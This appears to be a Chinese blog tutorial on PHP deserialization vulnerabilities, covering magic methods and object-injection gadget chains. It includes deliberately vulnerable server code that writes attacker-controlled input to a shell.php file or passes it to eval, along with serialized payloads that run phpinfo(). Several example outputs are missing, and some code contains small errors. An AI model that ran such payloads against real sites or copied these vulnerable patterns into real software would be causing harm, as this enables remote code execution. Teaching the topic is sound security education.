【反序列化】PHP反序列化漏洞與防御

0x01 概述

什么是php反序列化漏洞呢?簡單的來說,就是在php反序列化的時候,反序列化的內(nèi)容是用戶可控,那么惡意用戶就可以構(gòu)造特定序列化內(nèi)容的代碼,通過unserialize()函數(shù)進(jìn)行特定的反序列化操作,并且程序的某處存在一些敏感操作是寫在類中的,那么就可以通過這段惡意代碼,達(dá)到執(zhí)行攻擊者想要的操作。

在了解php反序列化漏洞之前,需要了解一下php序列化和反序列化的相關(guān)知識。

0x02 PHP序列化與反序列化

<?php
class Test{
    public $var = "This is a test";

    public function PrintVar(){
        echo this -> $var;
    }
}

$obj = new Test();
$obj->PrintVar();
?>

運行后

magic 函數(shù)

php面向?qū)ο笞兂芍校幸活惡瘮?shù)叫做magic function,魔術(shù)函數(shù),這些函數(shù)是以__(雙下劃線)開頭的,他們是一些當(dāng)依照某些規(guī)則實例化類或者調(diào)用某些函數(shù)的時候會自動調(diào)用這些magic函數(shù),這里說一下比較常見的例如__construct,__destory,
__sleep,__wakeup,__toString函數(shù)。

  1. __construct()
    __contstruct()函數(shù)被稱為構(gòu)造函數(shù),當(dāng)實例化類的時候會自動調(diào)用該函數(shù)

  2. __destruct()
    __destruct()函數(shù)被稱為析構(gòu)函數(shù),當(dāng)類結(jié)束的時候自動調(diào)用該函數(shù)

  3. __sleep()
    __sleep()函數(shù)是當(dāng)php進(jìn)行序列化操作(serialize)的時候自動調(diào)用該函數(shù),可以用于清理對象,并返回一個包含對象中所有應(yīng)被序列化的變量名稱的數(shù)組。如果該方法未返回任何內(nèi)容,則 NULL 被序列化,并產(chǎn)生一個 E_NOTICE 級別的錯誤。

  4. __wakeup()
    __wakeup()函數(shù)是當(dāng)php進(jìn)行反序列化操作(unserialize)的時候自動調(diào)用該函數(shù)

  5. __toString()
    __toString()函數(shù)是當(dāng)對象被當(dāng)做字符串的時候會自動調(diào)用該函數(shù)

例如:

運行后結(jié)果:

私有成員與被保護(hù)成員變量的特殊性
當(dāng)類中的成員變量是私有的或者被保護(hù)的,那么會產(chǎn)生一些特殊的情況

運行結(jié)果:

我們可以看到,在序列化后得到的序列化代碼中,私有成員變量name前加了一個User,被保護(hù)變量成員age的前面加了一個,并且明明Username長度為8,但是卻顯示的是10;同樣,明明age的長度為4,但卻顯示的是6。
查閱php手冊發(fā)現(xiàn),當(dāng)成員變量是私有的時候,會在成員變量前面添加類名;當(dāng)成員變量是被保護(hù)的時候,會在被保護(hù)成員前面添加一個,并且,所添加的類名或者的左右兩邊都會有一個null字節(jié),因此,這兩個長度都增加了2。

0x03 PHP反序列化漏洞

  1. __wakeup()或__destruct()的利用場景

假設(shè)服務(wù)器的代碼如下:

<?php 
class Test{
    var $test = "123";
    function __wakeup(){
        $fp = fopen("test.php", 'w');
        fwrite($fp, $this -> test);
        fclose($fp);
    }
}

$test1 = $_GET['test'];
print_r($test1);
echo "<br />";
$seri = unserialize($test1);

require "test.php";

?>

我們可以在本地搭建環(huán)境,編寫exp之后用serialize函數(shù)進(jìn)行序列化,得到payload,如:

O:4:"Test":1:{s:4:"test";s:18:"<?php%20phpinfo();?>";}
  1. 其他Magic Function情況

當(dāng)unserialize的時候不是直接在wakup魔術(shù)方法中利用,比如在construct之類的,也是有利用價值的。譬如,當(dāng)wakup中又調(diào)用了別的對象,那么我們就可以進(jìn)行回溯去找,也許也可以利用到。例如:

<?php 
class Test1{
    function __construct($test){
        $fp = fopen("shell.php", "w");
        fwrite($fp, $test);
        fclose($fp);
    }
}

class Test2{
    var $test = "123";
    function __wakeup(){
        $obj = new Test1($this -> test);
    }
}

$test = $_GET['test'];
unserialize($test);

require "shell.php";
?>
  1. 普通情況

當(dāng)危險代碼存在類的普通方法中,就不能指望通過“自動調(diào)用”來達(dá)到目的了。這時可以尋找相同的函數(shù)名,把敏感函數(shù)和類聯(lián)系在一起。

<?php 
class Test1{
    var $test1;
    function __construct(){
        $this->test1 = new Test2();
    }

    function __destruct(){
        $this->test1->action();
    }
}

class Test2{
    function action(){
        echo "Test2";
    }
}

class Test3{
    var $test3;
    function action(){
        eval($this->test3);
    }
}

$test = new Test1();
unserialize($_GET['test']);
?>

這里我們可以利用Test3中的action函數(shù)中的eval函數(shù)做一些事情。

class Test1{
    var $test1;
    function __construct(){
        $this->test1 = new Test3();
    }

    function __destruct(){
        $this->test1->action();
    }
}

class Test3{
    var $test3 = "phpinfo();";
}

echo serialize(new Test1());

得到 O:5:"Test1":1:{s:5:"test1";O:5:"Test3":1:{s:5:"test3";s:10:"phpinfo();";}}

0x04 參考文獻(xiàn)

https://chybeta.github.io/2017/06/17/%E6%B5%85%E8%B0%88php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌,老刑警劉巖,帶你破解...
    沈念sama閱讀 230,182評論 6 543
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異,居然都是意外死亡,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 99,489評論 3 429
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人,你說我怎么就攤上這事。” “怎么了?”我有些...
    開封第一講書人閱讀 178,290評論 0 383
  • 文/不壞的土叔 我叫張陵,是天一觀的道長。 經(jīng)常有香客問我,道長,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 63,776評論 1 317
  • 正文 為了忘掉前任,我火速辦了婚禮,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘。我一直安慰自己,他們只是感情好,可當(dāng)我...
    茶點故事閱讀 72,510評論 6 412
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著,像睡著了一般。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 55,866評論 1 328
  • 那天,我揣著相機與錄音,去河邊找鬼。 笑死,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播,決...
    沈念sama閱讀 43,860評論 3 447
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 43,036評論 0 290
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 49,585評論 1 336
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 41,331評論 3 358
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 43,536評論 1 374
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情,我是刑警寧澤,帶...
    沈念sama閱讀 39,058評論 5 363
  • 正文 年R本政府宣布,位于F島的核電站,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 44,754評論 3 349
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧,春花似錦、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 35,154評論 0 28
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 36,469評論 1 295
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人。 一個月前我還...
    沈念sama閱讀 52,273評論 3 399
  • 正文 我出身青樓,卻偏偏與公主長得像,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 48,505評論 2 379

推薦閱讀更多精彩內(nèi)容

  • 0x00 序列化和反序列化 簡單的理解:序列化就是使用serialize()將對象的用字符串的方式進(jìn)行表示,反序列...
    漏斗社區(qū)閱讀 4,167評論 3 13
  • Php:腳本語言,網(wǎng)站建設(shè),服務(wù)器端運行 PHP定義:一種服務(wù)器端的HTML腳本/編程語言,是一種簡單的、面向?qū)ο?..
    廖馬兒閱讀 2,165評論 2 38
  • JAVA序列化機制的深入研究 對象序列化的最主要的用處就是在傳遞,和保存對象(object)的時候,保證對象的完整...
    時待吾閱讀 10,903評論 0 24
  • 最近轟動世界最大的新聞,莫過于林肯公園的主唱自殺了。并且爆料出,他自殺前深受酗酒與毒品的困擾,原因是童年的一段不堪...
    榕樹下的野兔子閱讀 551評論 0 0
  • 我在高中剛開始的時候,很迷茫,很無措,我沒有好朋友。為了不讓別人覺得自己特失敗,我每天早上在別人起床是就已經(jīng)走了,...
    果兒_c5dc閱讀 259評論 0 0